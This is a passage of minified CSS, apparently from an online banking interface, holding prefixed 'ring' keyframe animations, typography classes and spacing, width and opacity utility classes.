g);transform:rotate(-8deg)}33%{-webkit-transform:rotate(6deg);-ms-transform:rotate(6deg);transform:rotate(6deg)}35%{-webkit-transform:rotate(-4deg);-ms-transform:rotate(-4deg);transform:rotate(-4deg)}37%{-webkit-transform:rotate(2deg);-ms-transform:rotate(2deg);transform:rotate(2deg)}39%{-webkit-transform:rotate(-1deg);-ms-transform:rotate(-1deg);transform:rotate(-1deg)}41%{-webkit-transform:rotate(1deg);-ms-transform:rotate(1deg);transform:rotate(1deg)}43%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}}@-moz-keyframes ring{0%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}1%{-webkit-transform:rotate(30deg);-ms-transform:rotate(30deg);transform:rotate(30deg)}3%{-webkit-transform:rotate(-28deg);-ms-transform:rotate(-28deg);transform:rotate(-28deg)}5%{-webkit-transform:rotate(34deg);-ms-transform:rotate(34deg);transform:rotate(34deg)}7%{-webkit-transform:rotate(-32deg);-ms-transform:rotate(-32deg);transform:rotate(-32deg)}9%{-webkit-transform:rotate(30deg);-ms-transform:rotate(30deg);transform:rotate(30deg)}11%{-webkit-transform:rotate(-28deg);-ms-transform:rotate(-28deg);transform:rotate(-28deg)}13%{-webkit-transform:rotate(26deg);-ms-transform:rotate(26deg);transform:rotate(26deg)}15%{-webkit-transform:rotate(-24deg);-ms-transform:rotate(-24deg);transform:rotate(-24deg)}17%{-webkit-transform:rotate(22deg);-ms-transform:rotate(22deg);transform:rotate(22deg)}19%{-webkit-transform:rotate(-20deg);-ms-transform:rotate(-20deg);transform:rotate(-20deg)}21%{-webkit-transform:rotate(18deg);-ms-transform:rotate(18deg);transform:rotate(18deg)}23%{-webkit-transform:rotate(-16deg);-ms-transform:rotate(-16deg);transform:rotate(-16deg)}25%{-webkit-transform:rotate(14deg);-ms-transform:rotate(14deg);transform:rotate(14deg)}27%{-webkit-transform:rotate(-12deg);-ms-transform:rotate(-12deg);transform:rotate(-12deg)}29%{-webkit-transform:rotate(10deg);-ms-transform:rotate(10deg);transform:rotate(10deg)}31%{-webkit-transform:rotate(-8deg);-ms-transform:rotate(-8deg);transform:rotate(-8deg)}33%{-webkit-transform:rotate(6deg);-ms-transform:rotate(6deg);transform:rotate(6deg)}35%{-webkit-transform:rotate(-4deg);-ms-transform:rotate(-4deg);transform:rotate(-4deg)}37%{-webkit-transform:rotate(2deg);-ms-transform:rotate(2deg);transform:rotate(2deg)}39%{-webkit-transform:rotate(-1deg);-ms-transform:rotate(-1deg);transform:rotate(-1deg)}41%{-webkit-transform:rotate(1deg);-ms-transform:rotate(1deg);transform:rotate(1deg)}43%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}}@-ms-keyframes ring{0%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}1%{-webkit-transform:rotate(30deg);-ms-transform:rotate(30deg);transform:rotate(30deg)}3%{-webkit-transform:rotate(-28deg);-ms-transform:rotate(-28deg);transform:rotate(-28deg)}5%{-webkit-transform:rotate(34deg);-ms-transform:rotate(34deg);transform:rotate(34deg)}7%{-webkit-transform:rotate(-32deg);-ms-transform:rotate(-32deg);transform:rotate(-32deg)}9%{-webkit-transform:rotate(30deg);-ms-transform:rotate(30deg);transform:rotate(30deg)}11%{-webkit-transform:rotate(-28deg);-ms-transform:rotate(-28deg);transform:rotate(-28deg)}13%{-webkit-transform:rotate(26deg);-ms-transform:rotate(26deg);transform:rotate(26deg)}15%{-webkit-transform:rotate(-24deg);-ms-transform:rotate(-24deg);transform:rotate(-24deg)}17%{-webkit-transform:rotate(22deg);-ms-transform:rotate(22deg);transform:rotate(22deg)}19%{-webkit-transform:rotate(-20deg);-ms-transform:rotate(-20deg);transform:rotate(-20deg)}21%{-webkit-transform:rotate(18deg);-ms-transform:rotate(18deg);transform:rotate(18deg)}23%{-webkit-transform:rotate(-16deg);-ms-transform:rotate(-16deg);transform:rotate(-16deg)}25%{-webkit-transform:rotate(14deg);-ms-transform:rotate(14deg);transform:rotate(14deg)}27%{-webkit-transform:rotate(-12deg);-ms-transform:rotate(-12deg);transform:rotate(-12deg)}29%{-webkit-transform:rotate(10deg);-ms-transform:rotate(10deg);transform:rotate(10deg)}31%{-webkit-transform:rotate(-8deg);-ms-transform:rotate(-8deg);transform:rotate(-8deg)}33%{-webkit-transform:rotate(6deg);-ms-transform:rotate(6deg);transform:rotate(6deg)}35%{-webkit-transform:rotate(-4deg);-ms-transform:rotate(-4deg);transform:rotate(-4deg)}37%{-webkit-transform:rotate(2deg);-ms-transform:rotate(2deg);transform:rotate(2deg)}39%{-webkit-transform:rotate(-1deg);-ms-transform:rotate(-1deg);transform:rotate(-1deg)}41%{-webkit-transform:rotate(1deg);-ms-transform:rotate(1deg);transform:rotate(1deg)}43%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}}@-o-keyframes ring{0%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}1%{-webkit-transform:rotate(30deg);-ms-transform:rotate(30deg);transform:rotate(30deg)}3%{-webkit-transform:rotate(-28deg);-ms-transform:rotate(-28deg);transform:rotate(-28deg)}5%{-webkit-transform:rotate(34deg);-ms-transform:rotate(34deg);transform:rotate(34deg)}7%{-webkit-transform:rotate(-32deg);-ms-transform:rotate(-32deg);transform:rotate(-32deg)}9%{-webkit-transform:rotate(30deg);-ms-transform:rotate(30deg);transform:rotate(30deg)}11%{-webkit-transform:rotate(-28deg);-ms-transform:rotate(-28deg);transform:rotate(-28deg)}13%{-webkit-transform:rotate(26deg);-ms-transform:rotate(26deg);transform:rotate(26deg)}15%{-webkit-transform:rotate(-24deg);-ms-transform:rotate(-24deg);transform:rotate(-24deg)}17%{-webkit-transform:rotate(22deg);-ms-transform:rotate(22deg);transform:rotate(22deg)}19%{-webkit-transform:rotate(-20deg);-ms-transform:rotate(-20deg);transform:rotate(-20deg)}21%{-webkit-transform:rotate(18deg);-ms-transform:rotate(18deg);transform:rotate(18deg)}23%{-webkit-transform:rotate(-16deg);-ms-transform:rotate(-16deg);transform:rotate(-16deg)}25%{-webkit-transform:rotate(14deg);-ms-transform:rotate(14deg);transform:rotate(14deg)}27%{-webkit-transform:rotate(-12deg);-ms-transform:rotate(-12deg);transform:rotate(-12deg)}29%{-webkit-transform:rotate(10deg);-ms-transform:rotate(10deg);transform:rotate(10deg)}31%{-webkit-transform:rotate(-8deg);-ms-transform:rotate(-8deg);transform:rotate(-8deg)}33%{-webkit-transform:rotate(6deg);-ms-transform:rotate(6deg);transform:rotate(6deg)}35%{-webkit-transform:rotate(-4deg);-ms-transform:rotate(-4deg);transform:rotate(-4deg)}37%{-webkit-transform:rotate(2deg);-ms-transform:rotate(2deg);transform:rotate(2deg)}39%{-webkit-transform:rotate(-1deg);-ms-transform:rotate(-1deg);transform:rotate(-1deg)}41%{-webkit-transform:rotate(1deg);-ms-transform:rotate(1deg);transform:rotate(1deg)}43%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}}@keyframes ring{0%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}1%{-webkit-transform:rotate(30deg);-ms-transform:rotate(30deg);transform:rotate(30deg)}3%{-webkit-transform:rotate(-28deg);-ms-transform:rotate(-28deg);transform:rotate(-28deg)}5%{-webkit-transform:rotate(34deg);-ms-transform:rotate(34deg);transform:rotate(34deg)}7%{-webkit-transform:rotate(-32deg);-ms-transform:rotate(-32deg);transform:rotate(-32deg)}9%{-webkit-transform:rotate(30deg);-ms-transform:rotate(30deg);transform:rotate(30deg)}11%{-webkit-transform:rotate(-28deg);-ms-transform:rotate(-28deg);transform:rotate(-28deg)}13%{-webkit-transform:rotate(26deg);-ms-transform:rotate(26deg);transform:rotate(26deg)}15%{-webkit-transform:rotate(-24deg);-ms-transform:rotate(-24deg);transform:rotate(-24deg)}17%{-webkit-transform:rotate(22deg);-ms-transform:rotate(22deg);transform:rotate(22deg)}19%{-webkit-transform:rotate(-20deg);-ms-transform:rotate(-20deg);transform:rotate(-20deg)}21%{-webkit-transform:rotate(18deg);-ms-transform:rotate(18deg);transform:rotate(18deg)}23%{-webkit-transform:rotate(-16deg);-ms-transform:rotate(-16deg);transform:rotate(-16deg)}25%{-webkit-transform:rotate(14deg);-ms-transform:rotate(14deg);transform:rotate(14deg)}27%{-webkit-transform:rotate(-12deg);-ms-transform:rotate(-12deg);transform:rotate(-12deg)}29%{-webkit-transform:rotate(10deg);-ms-transform:rotate(10deg);transform:rotate(10deg)}31%{-webkit-transform:rotate(-8deg);-ms-transform:rotate(-8deg);transform:rotate(-8deg)}33%{-webkit-transform:rotate(6deg);-ms-transform:rotate(6deg);transform:rotate(6deg)}35%{-webkit-transform:rotate(-4deg);-ms-transform:rotate(-4deg);transform:rotate(-4deg)}37%{-webkit-transform:rotate(2deg);-ms-transform:rotate(2deg);transform:rotate(2deg)}39%{-webkit-transform:rotate(-1deg);-ms-transform:rotate(-1deg);transform:rotate(-1deg)}41%{-webkit-transform:rotate(1deg);-ms-transform:rotate(1deg);transform:rotate(1deg)}43%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0)}}.display-7{font-size:12px;font-weight:500;line-height:16px}.display-6{font-size:14px;font-weight:500;line-height:18px}.display-5{font-size:16px;font-weight:500;line-height:22px}.display-4{font-size:36px;font-weight:500;line-height:44px}.display-3{font-size:44px;font-weight:500;line-height:52px}.display-2{font-size:52px;font-weight:500;line-height:64px}.display-1{font-size:96px;font-weight:500;line-height:112px}.heading-6,.pl-input-group__title,.pl-text-group__title,.toggle-status__content .content__title,.settlement-form__body__title,.lucky-num__lst__title,.modal-schedule-bill-details .modal-container .head-info .title,.transfer .transfer-content .transfer-form .title{font-size:20px;font-weight:600;line-height:30px}.heading-5{font-size:24px;font-weight:600;line-height:36px}.heading-4{font-size:28px;font-weight:600;line-height:40px}.heading-3{font-size:32px;font-weight:600;line-height:44px}.heading-2{font-size:36px;font-weight:600;line-height:44px}.heading-1{font-size:40px;font-weight:600;line-height:52px}.label-4{font-size:12px;font-weight:500;line-height:16px}.label-3,.modal-template .head .contact-info .phone{font-size:14px;font-weight:500;line-height:20px}.label-2,.lucky-num__type .lucky-type-radio,.payment-form__content__detail-bill .list-bill__footer .value{font-size:16px;font-weight:500;line-height:24px}.label-1,.modal-template .body-detail .head-info .name,.modal-schedule-bill-details .modal-container .body-detail .head-info .name{font-size:18px;font-weight:500;line-height:24px}.paragraph-4,.payment-layout__body__notice{font-size:12px;font-weight:400;line-height:20px}.paragraph-3,.paragraph-small{font-size:14px;font-weight:400;line-height:20px}.paragraph-2,.not-require-otp,.pl-input-group__col:nth-child(1),.payment-layout,.auto-debit-registration-confirm__body__otp .label,.card-row__card-info .card-more-info .group-info .label,.card-row__card-info .card-more-info .group-info .value,.online-payment-registration-confirm__body__otp .label,.sms-setting-confirm__body__otp .label,.closeAccount-internal__otp-form,.toggle-status__content .content-lock,.settlement-confirm__body__otp .label,.orderBond-internal__otp-form,.payment-creditcard__content__otp .otp-sent,.payment-loan__content__otp .otp-sent,.payment-confirm__body__otp .label,.modal-template .body-form .label-favorite,.modal-template .body-form .modal-row .modal-col:first-child,.modal-template .body-detail .details .row .label,.modal-schedule-bill-details .modal-container .body-detail .details .row .label,.transfer .transfer-content .otp-content .otp-row .otp-col:nth-child(1),.transfer .transfer-content .transfer-form .trans-row .trans-col:nth-child(1),.transfer-external .transfer-external__otp-form,.transfer-internal__otp-form,.transfer-stock .transfer-stock__otp-form{font-size:16px;font-weight:400;line-height:24px}.paragraph-1{font-size:18px;font-weight:400;line-height:28px}@media screen and (max-width: 1279px){.m-heading-xs{font-size:18px;font-weight:600;line-height:28px}.m-heading-s{font-size:20px;font-weight:600;line-height:28px}.m-heading-m{font-size:24px;font-weight:600;line-height:32px}.m-heading-l{font-size:28px;font-weight:600;line-height:36px}.m-heading-xl{font-size:32px;font-weight:600;line-height:40px}.m-heading-xxl{font-size:36px;font-weight:600;line-height:44px}.m-label-xs{font-size:12px;font-weight:500;line-height:20px}.m-label-s{font-size:14px;font-weight:500;line-height:20px}.m-label-m,.payment-column:nth-of-type(2){font-size:16px;font-weight:500;line-height:24px}.m-label-l{font-size:18px;font-weight:500;line-height:28px}.m-label-xl{font-size:20px;font-weight:500;line-height:28px}.m-label-xxl{font-size:24px;font-weight:500;line-height:32px}.m-paragraph-xs{font-size:12px;font-weight:400;line-height:20px}.m-paragraph-s{font-size:14px;font-weight:400;line-height:22px}.m-paragraph-m,.payment-column:nth-of-type(1){font-size:16px;font-weight:400;line-height:24px}.m-paragraph-l{font-size:18px;font-weight:400;line-height:28px}.m-paragraph-xl{font-size:20px;font-weight:400;line-height:28px}.m-paragraph-xxl{font-size:24px;font-weight:400;line-height:28px}}pre{font-family:'Source Sans Pro', sans-serif;line-height:24px;white-space:pre-wrap;overflow-wrap:break-word}.nowrap{white-space:nowrap !important}.cursor-default{cursor:default}.pointer{cursor:pointer}.not-allow,.not-allowed{cursor:not-allowed !important}.break-all{word-break:break-all}.break-word{word-break:break-word}.oneline-text{overflow:hidden;white-space:nowrap;text-overflow:ellipsis}.align-center{text-align:center}.hidden{display:none !important}.d-inline-block{display:inline-block !important}.d-block{display:block !important}.d-flex{display:flex}.flex-row{flex-direction:row}.flex-column{flex-direction:column}.flex-between{display:flex;justify-content:space-between}.flex-1{flex:1 1}.relative{position:relative}.absolute{position:absolute}.width-0{width:0%}.basis-0{flex-basis:0%}.width-1{width:1%}.basis-1{flex-basis:1%}.width-2{width:2%}.basis-2{flex-basis:2%}.width-3{width:3%}.basis-3{flex-basis:3%}.width-4{width:4%}.basis-4{flex-basis:4%}.width-5{width:5%}.basis-5{flex-basis:5%}.width-6{width:6%}.basis-6{flex-basis:6%}.width-7{width:7%}.basis-7{flex-basis:7%}.width-8{width:8%}.basis-8{flex-basis:8%}.width-9{width:9%}.basis-9{flex-basis:9%}.width-10{width:10%}.basis-10{flex-basis:10%}.width-11{width:11%}.basis-11{flex-basis:11%}.width-12{width:12%}.basis-12{flex-basis:12%}.width-13{width:13%}.basis-13{flex-basis:13%}.width-14{width:14%}.basis-14{flex-basis:14%}.width-15{width:15%}.basis-15{flex-basis:15%}.width-16{width:16%}.basis-16{flex-basis:16%}.width-17{width:17%}.basis-17{flex-basis:17%}.width-18{width:18%}.basis-18{flex-basis:18%}.width-19{width:19%}.basis-19{flex-basis:19%}.width-20{width:20%}.basis-20{flex-basis:20%}.width-21{width:21%}.basis-21{flex-basis:21%}.width-22{width:22%}.basis-22{flex-basis:22%}.width-23{width:23%}.basis-23{flex-basis:23%}.width-24{width:24%}.basis-24{flex-basis:24%}.width-25{width:25%}.basis-25{flex-basis:25%}.width-26{width:26%}.basis-26{flex-basis:26%}.width-27{width:27%}.basis-27{flex-basis:27%}.width-28{width:28%}.basis-28{flex-basis:28%}.width-29{width:29%}.basis-29{flex-basis:29%}.width-30{width:30%}.basis-30{flex-basis:30%}.width-31{width:31%}.basis-31{flex-basis:31%}.width-32{width:32%}.basis-32{flex-basis:32%}.width-33{width:33%}.basis-33{flex-basis:33%}.width-34{width:34%}.basis-34{flex-basis:34%}.width-35{width:35%}.basis-35{flex-basis:35%}.width-36{width:36%}.basis-36{flex-basis:36%}.width-37{width:37%}.basis-37{flex-basis:37%}.width-38{width:38%}.basis-38{flex-basis:38%}.width-39{width:39%}.basis-39{flex-basis:39%}.width-40{width:40%}.basis-40{flex-basis:40%}.width-41{width:41%}.basis-41{flex-basis:41%}.width-42{width:42%}.basis-42{flex-basis:42%}.width-43{width:43%}.basis-43{flex-basis:43%}.width-44{width:44%}.basis-44{flex-basis:44%}.width-45{width:45%}.basis-45{flex-basis:45%}.width-46{width:46%}.basis-46{flex-basis:46%}.width-47{width:47%}.basis-47{flex-basis:47%}.width-48{width:48%}.basis-48{flex-basis:48%}.width-49{width:49%}.basis-49{flex-basis:49%}.width-50{width:50%}.basis-50{flex-basis:50%}.width-51{width:51%}.basis-51{flex-basis:51%}.width-52{width:52%}.basis-52{flex-basis:52%}.width-53{width:53%}.basis-53{flex-basis:53%}.width-54{width:54%}.basis-54{flex-basis:54%}.width-55{width:55%}.basis-55{flex-basis:55%}.width-56{width:56%}.basis-56{flex-basis:56%}.width-57{width:57%}.basis-57{flex-basis:57%}.width-58{width:58%}.basis-58{flex-basis:58%}.width-59{width:59%}.basis-59{flex-basis:59%}.width-60{width:60%}.basis-60{flex-basis:60%}.width-61{width:61%}.basis-61{flex-basis:61%}.width-62{width:62%}.basis-62{flex-basis:62%}.width-63{width:63%}.basis-63{flex-basis:63%}.width-64{width:64%}.basis-64{flex-basis:64%}.width-65{width:65%}.basis-65{flex-basis:65%}.width-66{width:66%}.basis-66{flex-basis:66%}.width-67{width:67%}.basis-67{flex-basis:67%}.width-68{width:68%}.basis-68{flex-basis:68%}.width-69{width:69%}.basis-69{flex-basis:69%}.width-70{width:70%}.basis-70{flex-basis:70%}.width-71{width:71%}.basis-71{flex-basis:71%}.width-72{width:72%}.basis-72{flex-basis:72%}.width-73{width:73%}.basis-73{flex-basis:73%}.width-74{width:74%}.basis-74{flex-basis:74%}.width-75{width:75%}.basis-75{flex-basis:75%}.width-76{width:76%}.basis-76{flex-basis:76%}.width-77{width:77%}.basis-77{flex-basis:77%}.width-78{width:78%}.basis-78{flex-basis:78%}.width-79{width:79%}.basis-79{flex-basis:79%}.width-80{width:80%}.basis-80{flex-basis:80%}.width-81{width:81%}.basis-81{flex-basis:81%}.width-82{width:82%}.basis-82{flex-basis:82%}.width-83{width:83%}.basis-83{flex-basis:83%}.width-84{width:84%}.basis-84{flex-basis:84%}.width-85{width:85%}.basis-85{flex-basis:85%}.width-86{width:86%}.basis-86{flex-basis:86%}.width-87{width:87%}.basis-87{flex-basis:87%}.width-88{width:88%}.basis-88{flex-basis:88%}.width-89{width:89%}.basis-89{flex-basis:89%}.width-90{width:90%}.basis-90{flex-basis:90%}.width-91{width:91%}.basis-91{flex-basis:91%}.width-92{width:92%}.basis-92{flex-basis:92%}.width-93{width:93%}.basis-93{flex-basis:93%}.width-94{width:94%}.basis-94{flex-basis:94%}.width-95{width:95%}.basis-95{flex-basis:95%}.width-96{width:96%}.basis-96{flex-basis:96%}.width-97{width:97%}.basis-97{flex-basis:97%}.width-98{width:98%}.basis-98{flex-basis:98%}.width-99{width:99%}.basis-99{flex-basis:99%}.opacity-0{opacity:0}.scale-off-0{-webkit-transform:scale(0);-ms-transform:scale(0);transform:scale(0)}.opacity-1{opacity:.1}.scale-off-1{-webkit-transform:scale(.1);-ms-transform:scale(.1);transform:scale(.1)}.opacity-2{opacity:.2}.scale-off-2{-webkit-transform:scale(.2);-ms-transform:scale(.2);transform:scale(.2)}.opacity-3{opacity:.3}.scale-off-3{-webkit-transform:scale(.3);-ms-transform:scale(.3);transform:scale(.3)}.opacity-4{opacity:.4}.scale-off-4{-webkit-transform:scale(.4);-ms-transform:scale(.4);transform:scale(.4)}.opacity-5{opacity:.5}.scale-off-5{-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}.opacity-6{opacity:.6}.scale-off-6{-webkit-transform:scale(.6);-ms-transform:scale(.6);transform:scale(.6)}.opacity-7{opacity:.7}.scale-off-7{-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.7)}.opacity-8{opacity:.8}.scale-off-8{-webkit-transform:scale(.8);-ms-transform:scale(.8);transform:scale(.8)}.opacity-9{opacity:.9}.scale-off-9{-webkit-transform:scale(.9);-ms-transform:scale(.9);transform:scale(.9)}.text-white{color:#fff !important}.text-default{color:#062A46 !important}.text-primary{color:#005993 !important}.text-secondary{color:#9EB3C9 !important}.text-success{color:#4CB944 !important}.text-danger{color:#EE2E63 !important}.text-bold{font-weight:600 !important}.text-bolder{font-weight:bolder !important}.text-medium{font-weight:500 !important}.text-center{text-align:center}.text-right{text-align:right}.text-left{text-align:left}.text-lower{text-transform:lowercase}.text-upper{text-transform:uppercase}.text-underline{text-decoration:underline !important}.border-bottom{border-bottom:1px solid #C9D9EA}.border-bottom-dash{border-bottom:1px dashed #C9D9EA}.p-0{padding:0px !important}.p-1{padding:4px !important}.p-2{padding:8px !important}.p-3{padding:12px !important}.p-4{padding:16px !important}.p-5{padding:20px !important}.p-6{padding:24px !important}.p-7{padding:28px !important}.p-8{padding:32px !important}.p-9{padding:36px !important}.p-10{padding:40px !important}.p-11{padding:44px !important}.p-12{padding:48px !important}.p-auto{padding:auto !important}.pt-0{padding-top:0px !important}.pt-1{padding-top:4px !important}.pt-2{padding-top:8px !important}.pt-3{padding-top:12px !important}.pt-4{padding-top:16px !important}.pt-5{padding-top:20px !important}.pt-6{padding-top:24px !important}.pt-7{padding-top:28px !important}.pt-8{padding-top:32px !important}.pt-9{padding-top:36px !important}.pt-10{padding-top:40px !important}.pt-11{padding-top:44px !important}.pt-12{padding-top:48px !important}.pt-auto{padding-top:auto !important}.pr-0{padding-right:0px !important}.pr-1{padding-right:4px !important}.pr-2{padding-right:8px !important}.pr-3{padding-right:12px !important}.pr-4{padding-right:16px !important}.pr-5{padding-right:20px !important}.pr-6{padding-right:24px !important}.pr-7{padding-right:28px !important}.pr-8{padding-right:32px !important}.pr-9{padding-right:36px !important}.pr-10{padding-right:40px !important}.pr-11{padding-right:44px !important}.pr-12{padding-right:48px !important}.pr-auto{padding-right:auto !important}.pb-0{padding-bottom:0px !important}.pb-1{padding-bottom:4px !important}.pb-2{padding-bottom:8px !important}.pb-3{padding-bottom:12px !important}.pb-4{padding-bottom:16px !important}.pb-5{padding-bottom:20px !important}.pb-6{padding-bottom:24px !important}.pb-7{padding-bottom:28px !important}.pb-8{padding-bottom:32px !important}.pb-9{padding-bottom:36px !important}.pb-10{padding-bottom:40px !important}.pb-11{padding-bottom:44px !important}.pb-12{padding-bottom:48px !important}.pb-auto{padding-bottom:auto !important}.pl-0{padding-left:0px !important}.pl-1{padding-left:4px !important}.pl-2{padding-left:8px !important}.pl-3{padding-left:12px !important}.pl-4{padding-left:16px !important}.pl-5{padding-left:20px !important}.pl-6{padding-left:24px !important}.pl-7{padding-left:28px !important}.pl-8{padding-left:32px !important}.pl-9{padding-left:36px !important}.pl-10{padding-left:40px !important}.pl-11{padding-left:44px !important}.pl-12{padding-left:48px !important}.pl-auto{padding-left:auto !important}.px-0{padding-left:0px !important;padding-right:0px !important}.px-1{padding-left:4px !important;padding-right:4px !important}.px-2{padding-left:8px !important;padding-right:8px !important}.px-3{padding-left:12px !important;padding-right:12px !important}.px-4{padding-left:16px !important;padding-right:16px !important}.px-5{padding-left:20px !important;padding-right:20px !important}.px-6{padding-left:24px !important;padding-right:24px !important}.px-7{padding-left:28px !important;padding-right:28px !important}.px-8{padding-left:32px !important;padding-right:32px !important}.px-9{padding-left:36px !important;padding-right:36px !important}.px-10{padding-left:40px !important;padding-right:40px !important}.px-11{padding-left:44px !important;padding-right:44px !important}.px-12{padding-left:48px !important;padding-right:48px !important}.px-auto{padding-left:auto !important;padding-right:auto !important}.py-0{padding-top:0px !important;padding-bottom:0px !important}.py-1{padding-top:4px !important;padding-bottom:4px !important}.py-2{padding-top:8px !important;padding-bottom:8px !important}.py-3{padding-top:12px !important;padding-bottom:12px !important}.py-4{padding-top:16px !important;padding-bottom:16px !important}.py-5{padding-top:20px !important;padding-bottom:20px !important}.py-6{padding-top:24px !important;padding-bottom:24px !important}.py-7{padding-top:28px !important;padding-bottom:28px !important}.py-8{padding-top:32px !important;padding-bottom:32px !important}.py-9{padding-top:36px !important;padding-bottom:36px !important}.py-10{padding-top:40px !important;padding-bottom:40px !important}.py-11{padding-top:44px !important;padding-bottom:44px !important}.py-12{padding-top:48px !important;padding-bottom:48px !important}.py-auto{padding-top:auto !important;padding-bottom:auto !important}.m-0{margin:0px !important}.m-1{margin:4px !important}.m-2{margin:8px !important}.m-3{margin:12px !important}.m-4{margin:16px !important}.m-5{margin:20px !important}.m-6{margin:24px !important}.m-7{margin:28px !important}.m-8{margin:32px !important}.m-9{margin:36px !important}.m-10{margin:40px !important}.m-11{margin:44px !important}.m-12{margin:48px !important}.m-auto{margin:auto !important}.mt-0{margin-top:0px !important}.mt-1{margin-top:4px !important}.mt-2{margin-top:8px !important}.mt-3{margin-top:12px !important}.mt-4{margin-top:16px !important}.mt-5{margin-top:20px !important}.mt-6{margin-top:24px !important}.mt-7{margin-top:28px !important}.mt-8{margin-top:32px !important}.mt-9{margin-top:36px !important}.mt-10{margin-top:40px !important}.mt-11{margin-top:44px !important}.mt-12{margin-top:48px !important}.mt-auto{margin-top:auto !important}.mr-0{margin-right:0px !important}.mr-1{margin-right:4px !important}.mr-2{margin-right:8px !important}.mr-3{margin-right:12px !important}.mr-4{margin-right:16px !important}.mr-5{margin-right:20px !important}.mr-6{margin-right:24px !important}.mr-7{margin-right:28px !important}.mr-8{margin-right:32px !important}.mr-9{margin-right:36px !important}.mr-10{margin-right:40px !important}.mr-11{margin-right:44px !important}.mr-12{margin-right:48px !important}.mr-auto{margin-right:auto !important}.mb-0{margin-bottom:0px !important}.mb-1{margin-bottom:4px !important}.mb-2{margin-bottom:8px !important}.mb-3{margin-bottom:12px !important}.mb-4{margin-bottom:16px !important}.mb-5{margin-bottom:20px !important}.mb-6{margin-bottom:24px !important}.mb-7{margin-bottom:28px !important}.mb-8{margin-bottom:32px !important}.mb-9{margin-bottom:36px !important}.mb-10{margin-bottom:40px !important}.mb-11{margin-bottom:44px !important}.mb-12{margin-bottom:48px !important}.mb-auto{margin-bottom:auto !important}.ml-0{margin-left:0px !important}.ml-1{margin-left:4px !important}.ml-2{margin-left:8px !important}.ml-3{margin-left:12px !important}.ml-4{margin-left:16px !important}.ml-5{margin-left:20px !important}.ml-6{margin-left:24px !important}.ml-7{margin-left:28px !important}.ml-8{margin-left:32px !important}.ml-9{margin-left:36px !important}.ml-10{margin-left:40px !important}.ml-11{margin-left:44px !important}.ml-12{margin-left:48px !important}.ml-auto{margin-left:auto !important}.mx-0{margin-left:0px !important;margin-right:0px !important}.mx-1{margin-left:4px !important;margin-right:4px !important}.mx-2{margin-left:8px !important;margin-right:8px !important}.mx-3{margin-left:12px !important;margin-right:12px !important}.mx-4{margin-left:16px !important;margin-right:16px !important}.mx-5{margin-left:20px !important;margin-right:20px !important}.mx-6{margin-left:24px !important;margin-right:24px !important}.mx-7{margin-left:28px !important;margin-right:28px !important}.mx-8{margin-left:32px !important;margin-right:32px !important}.mx-9{margin-left:36px !important;margin-right:36px !important}.mx-10{margin-left:40px !important;margin-right:40px !important}.mx-11{margin-left:44px !important;margin-right:44px !important}.mx-12{margin-left:48px !important;margin-right:48px !important}.mx-auto{margin-left:auto !important;margin-right:auto !important}.my-0{margin-top:0px !important;margin-bottom:0px !important}.my-1{margin-top:4px !important;margin-bottom:4px !important}.my-2{margin-top:8px !important;margin-bottom:8px !important}.my-3{margin-top:12px !important;margin-bottom:12px !important}.my-4{margin-top:16px !important;margin-bottom:16px !important}.my-5{margin-top:20px !important;margin-bottom:20px !important}.my-6{margin-top:24px !important;margin-bottom:24px !important}.my-7{margin-top:28px !important;margin-bottom:28px !important}.my-8{margin-top:32px !important;margin-bottom:32px !important}.my-9{margin-top:36px !important;margin-bottom:36px !important}.my-10{margin-top:40px !important;margin-bottom:40px !important}.my-11{margin-top:44px !important;margin-bottom:44px !important}.my-12{margin-top:48px !important;margin-bottom:48px !important}.my-auto{margin-top:auto !important;margin-bottom:auto !important}@media screen and (min-width: 576px){.p-sm-0{padding:0px !important}.p-sm-1{padding:4px !important}.p-sm-2{padding:8px !important}.p-sm-3{padding:12px !important}.p-sm-4{padding:16px !important}.p-sm-5{padding:20px !important}.p-sm-6{padding:24px !important}.p-sm-7{padding:28px !important}.p-sm-8{padding:32px !important}.p-sm-9{padding:36px !important}.p-sm-10{padding:40px !important}.p-sm-11{padding:44px !important}.p-sm-12{padding:48px !important}.p-sm-auto{padding:auto !important}.pt-sm-0{padding-top:0px !important}.pt-sm-1{padding-top:4px !important}.pt-sm-2{padding-top:8px !important}.pt-sm-3{padding-top:12px !important}.pt-sm-4{padding-top:16px !important}.pt-sm-5{padding-top:20px !important}.pt-sm-6{padding-top:24px !important}.pt-sm-7{padding-top:28px !important}.pt-sm-8{padding-top:32px !important}.pt-sm-9{padding-top:36px !important}.pt-sm-10{padding-top:40px !important}.pt-sm-11{padding-top:44px !important}.pt-sm-12{padding-top:48px !important}.pt-sm-auto{padding-top:auto !important}.pr-sm-0{padding-right:0px !important}.pr-sm-1{padding-right:4px !important}.pr-sm-2{padding-right:8px !important}.pr-sm-3{padding-right:12px !important}.pr-sm-4{padding-right:16px !important}.pr-sm-5{padding-right:20px !important}.pr-sm-6{padding-right:24px !important}.pr-sm-7{padding-right:28px !important}.pr-sm-8{padding-right:32px !important}.pr-sm-9{padding-right:36px !important}.pr-sm-10{padding-right:40px !important}.pr-sm-11{padding-right:44px !important}.pr-sm-12{padding-right:48px !important}.pr-sm-auto{padding-right:auto !important}.pb-sm-0{padding-bottom:0px !important}.pb-sm-1{padding-bottom:4px !important}.pb-sm-2{padding-bottom:8px !important}.pb-sm-3{padding-bottom:12px !important}.pb-sm-4{padding-bottom:16px !important}.pb-sm-5{padding-bottom:20px !important}.pb-sm-6{padding-bottom:24px !important}.pb-sm-7{padding-bottom:28px 